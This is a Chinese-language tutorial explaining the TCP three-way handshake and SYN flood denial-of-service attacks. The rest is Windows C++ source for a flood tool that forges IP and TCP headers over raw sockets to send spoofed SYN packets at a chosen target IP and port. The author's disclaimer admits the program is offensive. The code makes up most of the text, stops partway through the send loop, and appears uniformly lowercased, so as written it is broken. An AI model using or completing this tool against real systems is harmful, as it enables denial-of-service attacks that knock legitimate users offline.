syn_flood 简单分析及实现
writeby: liond8
email:liond8@eyou.com
声明:
此程序有一定攻击性,请只供学习之用,不要危害祖国的网络。如发动攻击一切后果本人概不负责。
网络上发送数据包的攻击有多种(如icmp_flood, 碎片攻击,等)其中有一种就是 利用tcp 协议三次 握手的攻击(syn_flood)。下面 就简单 讲述一下 tcp 的三次 握手。
现在 有a,b 两台 机器,其中b是server.a是client.
首先 a 发送送一个 带有syn标记(带起始序列号)的数据报 给b。
然后 b 接收, 然后 发送一个ack+syn(带b机的起始序列号 和 a的确认号)给a。
最后 a 再发送 一个带序列号 和 确认号的 数据报 给 b。
此时 连接 完成。
利用这个原理,如果a机在第一步伪装大量不存在的机器,给b发送大量的syn包,那么b会以为有很多合法的机器请求连接,然后一一回应。然后等待第三次 确认建立连接。那么大量等待连接的请求被保留在栈中。一般服务器等待2分钟还没等到第三次握手,那么就会从等待连接的栈中删除连接请求。如果a的syn发送得足够快,合法用户连接不上,那么服务器也会花费大量的资源来维护栈。从而照成d.o.s攻击。
通过raw_socket,只要你是管理员,就可以伪造ip和tcp头部,发虚假源地址的syn请求。
==========================================
简单实现如下:
/* flood.cpp*/
#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <time.h>
#include <dos.h>
#pragma comment(lib, "ws2_32.lib")
#define max_receivebyte 255
typedef struct ip_head //定义ip首部
{
unsigned char h_verlen; //4位首部长度,4位ip版本号
unsigned char tos; //8位服务类型tos
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位 (如syn,ack,等)
unsigned char ttl; //8位生存时间 ttl
unsigned char proto; //8位协议 (如icmp,tcp等)
unsigned short checksum; //16位ip首部校验和
unsigned int sourceip; //32位源ip地址
unsigned int destip; //32位目的ip地址
}ipheader;
typedef struct tcp_head //定义tcp首部
{
ushort th_sport; //16位源端口
ushort th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度/6位保留字
unsigned char th_flag; //6位标志位
ushort th_win; //16位窗口大小
ushort th_sum; //16位校验和
ushort th_urp; //16位紧急数据偏移量
}tcpheader;
typedef struct tsd_head //定义tcp伪首部
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz;
char ptcl; //协议类型
unsigned short tcpl; //tcp长度
}psdheader;
//checksum:计算校验和的子函数
ushort checksum(ushort *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(ushort);
}
if(size)
{
cksum += *(uchar*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (ushort)(~cksum);
}
void usage()
{
printf("***********************************************************");
printf("syn_flood made by liond8");
printf("useage: flood target_ip target_port delay_time ");
printf("***********************************************************");
}
//delay_time单位为毫秒。
int main(int argc, char* argv[])
{
wsadata wsadata;
socket sock;
sockaddr_in addr_in;
ipheader ipheader;
tcpheader tcpheader;
psdheader psdheader;
int sourceport;
char szsendbuf[60]={0};
bool flag;
int rect,ntimeover;
int sleeptime;
usage();
if (argc < 3 || argc >4 )
{ printf("input error! ");
return false; }
if (argc==4) sleeptime=atoi(argv[3]);
else sleeptime=300;
if (wsastartup(makeword(2,2), &wsadata)!=0)
{
printf("wsastartup error!");
return false;
}
sock=null;
if ((sock=socket(af_inet,sock_raw,ipproto_ip))==invalid_socket)
{
printf("socket setup error!");
return false;
}
flag=true;
if (setsockopt(sock,ipproto_ip, ip_hdrincl,(char *)&flag,sizeof(flag))==socket_error)
{
printf("setsockopt ip_hdrincl error!");
return false;
}
ntimeover=1000;
if (setsockopt(sock, sol_socket, so_sndtimeo, (char*)&ntimeover, sizeof(ntimeover))==socket_error) //设置发送的时间
{
printf("setsockopt so_sndtimeo error!");
return false;
}
addr_in.sin_family=af_inet;
addr_in.sin_port=htons(atoi(argv[2]));
addr_in.sin_addr.s_un.s_addr=inet_addr(argv[1]);
while(true)
{
//填充ip首部
ipheader.h_verlen=(4<<4 | sizeof(ipheader)/sizeof(unsigned long));
ipheader.tos=0;
ipheader.total_len=htons(sizeof(ipheader)+sizeof(tcpheader)); //ip总长度
ipheader.ident=1;
ipheader.frag_and_flags=0; //无分片
ipheader.ttl=(unsigned char)gettickcount()%87+123;
ipheader.proto=ipproto_tcp; // 协议类型为 tcp
ipheader.checksum=0; //效验位先初始为0
